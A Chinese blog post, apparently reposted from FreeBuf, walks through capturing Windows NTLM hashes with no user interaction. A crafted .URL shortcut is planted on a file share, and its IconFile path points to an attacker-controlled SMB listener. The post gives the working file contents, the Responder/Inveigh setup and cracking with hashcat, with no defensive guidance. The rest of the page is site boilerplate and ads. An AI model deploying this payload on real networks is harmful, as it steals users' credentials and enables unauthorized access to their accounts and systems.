一种无需用户交互捕获哈希的方法

栏目: 数据库 · 发布时间: 6年前

内容简介:这段时间我在微博上翻看了大量的帖子,其中有一篇来自@insertscript的帖子,介绍了一种无交互式抓取哈希值的技巧。其使用.URL文件访问环境变量,用户无需任何用户交互即可连接到攻击者的文件共享。以下内容摘自@insertscript的帖子:“只要explorer.exe的的查看包含.URL文件的文件夹,它就会在发送实际请求之前查找任何指定的环境变量,如%PATH%或%USERNAME%,从而将内容泄露给由攻击者控制的服务器。“(

这段时间我在微博上翻看了大量的帖子,其中有一篇来自@insertscript的帖子,介绍了一种无交互式抓取哈希值的技巧。其使用.URL文件访问环境变量,用户无需任何用户交互即可连接到攻击者的文件共享。

以下内容摘自@insertscript的帖子:

“只要explorer.exe的的查看包含.URL文件的文件夹,它就会在发送实际请求之前查找任何指定的环境变量,如%PATH%或%USERNAME%,从而将内容泄露给由攻击者控制的服务器。“( https://insert-script.blogspot.com/2018/08/leaking-environment-variables-in_20.html

首先,我们在攻击机上设置SMBListener(通常情况下在内网环境中,大多数公司都会阻止SMB流量出站)。

一种无需用户交互捕获哈希的方法

接着,我们在文件共享上创建一个文本文件。(创建文件后,你可以将其放在任何共享上)。

一种无需用户交互捕获哈希的方法

将以下内容粘贴到文本文件中:

[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\PutYourSmbListenerShareHere\%USERNAME%.icon
IconIndex=1

以上你只需将IconFile PATH替换为你在SMBServer,Responder或Inveigh中设置的共享即可。注意:这里的%USERNAME%。icon不要改动。如下:

一种无需用户交互捕获哈希的方法

现在,请确保你已勾选文件名扩展和隐藏文件选项。

一种无需用户交互捕获哈希的方法

使用.URL扩展重命名文件注意:当使用相同文件名时,将导致无法正常工作因此,建议大家每次都只创建唯一的文件名(例如1.url,2.url等)!

一种无需用户交互捕获哈希的方法

重命名后应该看起来像下面这样:

一种无需用户交互捕获哈希的方法

此时,在你的smb listener应该已经获取到了一个连接!

一种无需用户交互捕获哈希的方法

现在,任何人只要访问该共享,都将尝试自动的向你的SMB listener进行身份验证。

复制哈希并使用hashcat破解。

一种无需用户交互捕获哈希的方法

将其粘贴到文件中

一种无需用户交互捕获哈希的方法

启动hashcat(希望密码包含在你的字典列表中)

一种无需用户交互捕获哈希的方法

成功解出了密码!

一种无需用户交互捕获哈希的方法

最后,感谢@insertscript的分享!也希望大家可以在微博上关注我(@_markmo_),我会第一时间向大家分享我学到的东西,就像其他人给予我的一样!

*参考来源: medium ,FB小编secist编译,转载请注明来自FreeBuf.COM


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

创新者的处方

创新者的处方

[美]克莱顿·克里斯坦森、杰罗姆·格罗斯曼、黄捷升 / 朱恒鹏、张琦 / 中国人民大学出版社 / 2015-9 / 89.90元

[内容简介] ● 创新大师克里斯坦森采用了哈佛商学院在20年研究中总结而出的、在各行业实践中获得成功的管理创新经验,把颠覆式创新理念引入美国医疗行业研究。医疗机构需要量体裁衣,选择合适的商业模式展开创新之举。 ● 作者同时探讨了医疗保险公司、制药企业、医学院和政府机构在医疗改革中起到的作用,从社会性角度深入剖析了医疗保健行业未来之路。 ● 医疗界人士、政策制定者、对医疗界现......一起来看看 《创新者的处方》 这本书的介绍吧!

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

图片转BASE64编码
图片转BASE64编码

在线图片转Base64编码工具

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具